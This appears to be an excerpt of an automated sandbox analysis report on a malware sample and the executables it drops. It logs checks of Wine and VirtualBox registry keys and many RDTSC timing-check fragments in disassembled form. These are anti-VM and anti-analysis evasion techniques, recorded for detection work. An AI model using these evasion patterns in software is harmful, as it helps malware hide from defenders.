Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3F39D second address: F3F3A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4E46 second address: 10C4E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4E51 second address: 10C4E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4E55 second address: 10C4E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4E59 second address: 10C4E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4E77 second address: 10C4E98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007EFDB8CDCB0Fh 0x00000008 jnp 00007EFDB8CDCB06h 0x0000000e pop edi 0x0000000f je 00007EFDB8CDCB12h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10BFB1B second address: 10BFB4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFDB8F26A1Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFDB8F26A1Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10BFB4E second address: 10BFB58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFDB8CDCB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C3E93 second address: 10C3EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edx 0x00000009 js 00007EFDB8F26A25h 0x0000000f jmp 00007EFDB8F26A1Fh 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4011 second address: 10C4015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C4015 second address: 10C4026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007EFDB8F26A16h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C41B1 second address: 10C41B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C41B7 second address: 10C41BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C41BB second address: 10C41CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFDB8CDCB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C41CA second address: 10C41D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C41D0 second address: 10C41D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C6E53 second address: 10C6EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFDB8F26A20h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jnl 00007EFDB8F26A1Eh 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push ebx 0x0000001a jnl 00007EFDB8F26A18h 0x00000020 pop ebx 0x00000021 pop eax 0x00000022 movsx edx, si 0x00000025 push 00000003h 0x00000027 jmp 00007EFDB8F26A22h 0x0000002c push 00000000h 0x0000002e mov edx, 0965B5E0h 0x00000033 push 00000003h 0x00000035 mov dh, 12h 0x00000037 push AF9CCAF3h 0x0000003c jg 00007EFDB8F26A20h 0x00000042 add dword ptr [esp], 1063350Dh 0x00000049 mov esi, dword ptr [ebp+122D3A49h] 0x0000004f lea ebx, dword ptr [ebp+1245BC1Eh] 0x00000055 mov edi, dword ptr [ebp+122D3B3Dh] 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007EFDB8F26A29h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C6EF6 second address: 10C6F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007EFDB8CDCB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C6F3E second address: 10C6F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C6F44 second address: 10C6F49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C6F49 second address: 10C6F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push ecx 0x0000000b mov ecx, dword ptr [ebp+122D3B19h] 0x00000011 pop esi 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D1CA2h], edi 0x0000001a push 6E0B5E14h 0x0000001f jnp 00007EFDB8F26A20h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C71B7 second address: 10C71BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C71BB second address: 10C71C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10C71C1 second address: 10C71C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7DF8 second address: 10E7DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7DFE second address: 10E7E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7E02 second address: 10E7E16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007EFDB8F26A16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007EFDB8F26A1Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7E16 second address: 10E7E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007EFDB8CDCB0Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7E25 second address: 10E7E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007EFDB8F26A16h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E7E39 second address: 10E7E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E5E18 second address: 10E5E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E5E1E second address: 10E5E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E5E26 second address: 10E5E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E5FAE second address: 10E5FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007EFDB8CDCB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E5FB8 second address: 10E5FD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFDB8F26A22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6169 second address: 10E6191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007EFDB8CDCB06h 0x00000009 jc 00007EFDB8CDCB06h 0x0000000f jmp 00007EFDB8CDCB17h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E62D4 second address: 10E62DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E62DA second address: 10E62DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6864 second address: 10E686C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E686C second address: 10E6872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6872 second address: 10E687D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFDB8F26A16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E687D second address: 10E689F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFDB8CDCB15h 0x00000008 pop eax 0x00000009 push eax 0x0000000a jno 00007EFDB8CDCB06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6A3E second address: 10E6A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6B7F second address: 10E6B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8CDCB10h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6B97 second address: 10E6BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007EFDB8F26A1Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6BB0 second address: 10E6BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6CFF second address: 10E6D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E6EA8 second address: 10E6EEC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFDB8CDCB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007EFDB8CDCB06h 0x00000011 jnl 00007EFDB8CDCB06h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f jng 00007EFDB8CDCB06h 0x00000025 push eax 0x00000026 pop eax 0x00000027 jmp 00007EFDB8CDCB19h 0x0000002c popad 0x0000002d push ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E705D second address: 10E7067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E75EE second address: 10E75F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E78A5 second address: 10E78BE instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFDB8F26A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jl 00007EFDB8F26A16h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E78BE second address: 10E78D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007EFDB8CDCB12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E78D6 second address: 10E78DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10E78DB second address: 10E78E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ECF39 second address: 10ECF43 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFDB8F26A1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ED57E second address: 10ED584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ED584 second address: 10ED5A0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFDB8F26A18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007EFDB8F26A1Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ED5A0 second address: 10ED5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007EFDB8CDCB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ED5AA second address: 10ED5BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ED7D2 second address: 10ED7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnc 00007EFDB8CDCB06h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10ED7E4 second address: 10ED7E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE869 second address: 10EE86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE86D second address: 10EE871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE871 second address: 10EE87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE87A second address: 10EE89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFDB8F26A16h 0x0000000a pop edx 0x0000000b jmp 00007EFDB8F26A22h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007EFDB8F26A16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE89F second address: 10EE8C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFDB8CDCB06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFDB8CDCB15h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE8C7 second address: 10EE8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10EE8D1 second address: 10EE8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2FFC second address: 10F3001 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F3001 second address: 10F300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F300A second address: 10F300E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F300E second address: 10F3014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F271B second address: 10F2725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2B76 second address: 10F2B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2D34 second address: 10F2D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2D3D second address: 10F2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFDB8CDCB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F2E86 second address: 10F2E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F6245 second address: 10F624B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F62CF second address: 10F6340 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007EFDB8F26A28h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007EFDB8F26A27h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 ja 00007EFDB8F26A29h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jne 00007EFDB8F26A1Eh 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 js 00007EFDB8F26A24h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 pop eax 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F64A4 second address: 10F64A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F64A8 second address: 10F64AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F6F73 second address: 10F6F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
